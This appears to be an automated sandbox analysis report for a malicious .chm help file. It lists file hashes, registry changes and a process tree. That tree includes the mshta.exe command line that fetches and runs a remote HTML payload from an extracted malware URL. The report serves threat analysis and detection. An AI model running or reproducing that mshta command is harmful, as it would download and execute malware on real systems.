Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20/09/2024, 15:11
Static task
static1
Behavioral task
behavioral1
Sample
b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37.chm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37.chm
Resource
win10v2004-20240802-en
General
-
Target
b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37.chm
-
Size
41KB
-
MD5
e557693cc879beeb1a455cac02724ea7
-
SHA1
448723380110d37364d3c960cd8191130ca96aa7
-
SHA256
b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37
-
SHA512
448f302a5aff395472c4ec52cdd11a69d4a93c1caba580e373b1e8b2413c5bc35be2e8757c9e77231d257dd94362cdc7e39be857b536410cc178fdae9afa6426
-
SSDEEP
768:vdz7GiZkaVmCsjBnqE9c2E8ouJEjg7J0BY25K4zhGmGc8:vlvqlnvI83GjgF0+IBz4vD
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/8.html
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1740 mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\International\CpMRU hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Size = "10" hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" hh.exe Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" hh.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3448 hh.exe 3448 hh.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3448 wrote to memory of 1740 3448 hh.exe 83 PID 3448 wrote to memory of 1740 3448 hh.exe 83
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\b73ee977154402f8eecc5a446baf0dba456a37d1ca9348858540a8d048f3fd37.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/8.html ,2⤵
- Blocklisted process makes network request
PID:1740
-